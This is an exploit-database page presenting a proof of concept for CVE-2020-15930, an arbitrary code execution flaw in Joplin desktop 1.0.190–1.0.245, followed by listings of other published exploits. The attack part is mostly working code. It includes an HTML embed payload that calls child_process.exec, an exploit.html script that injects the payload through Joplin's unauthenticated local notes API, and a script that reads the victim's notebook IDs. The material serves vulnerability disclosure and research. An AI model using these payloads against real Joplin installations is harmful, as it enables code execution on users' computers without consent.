Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"Joplin 1.0.245 - Arbitrary Code Execution (PoC)"

Author

Exploit author

"Ademar Nowasky Junior"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-09-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
# Version: 1.0.190 to 1.0.245
# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:
# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.

# 2. PoC
# Paste the following payload into a note:

<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">

# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.

<!-- exploit.html -->
<script>
    x = new XMLHttpRequest;
    j = {
        title: "CVE-2020-15930",
        body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
    };
    x.open("POST", "http://127.0.0.1:41184/notes");
    x.send(JSON.stringify(j));
</script>

# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.

<!-- notebooks.html -->
<script>
    x = new XMLHttpRequest();
    x.onreadystatechange = function() {
        if (x.readyState == XMLHttpRequest.DONE) {
            alert(x.responseText);
        }
    }
    x.open('GET', 'http://127.0.0.1:41184/folders');
    x.send();
</script>
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "รœnsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "OฤŸuz Tรผrkgenรง"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-10-14 "NodeBB Forum 1.12.2-1.14.2 - Account Takeover" webapps multiple "Muhammed Eren Uygun"
2020-10-12 "Liman 0.7 - Cross-Site Request Forgery (Change Password)" webapps multiple "George Tsimpidas"
2020-10-05 "MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection" webapps multiple "Aviv Beniash"
2020-09-28 "Joplin 1.0.245 - Arbitrary Code Execution (PoC)" webapps multiple "Ademar Nowasky Junior"
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-22 "Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution" webapps multiple "Milad Fadavvi"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
2020-09-11 "Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)" webapps multiple nepska
Release Date Title Type Platform Author
2020-09-28 "Joplin 1.0.245 - Arbitrary Code Execution (PoC)" webapps multiple "Ademar Nowasky Junior"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48837/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.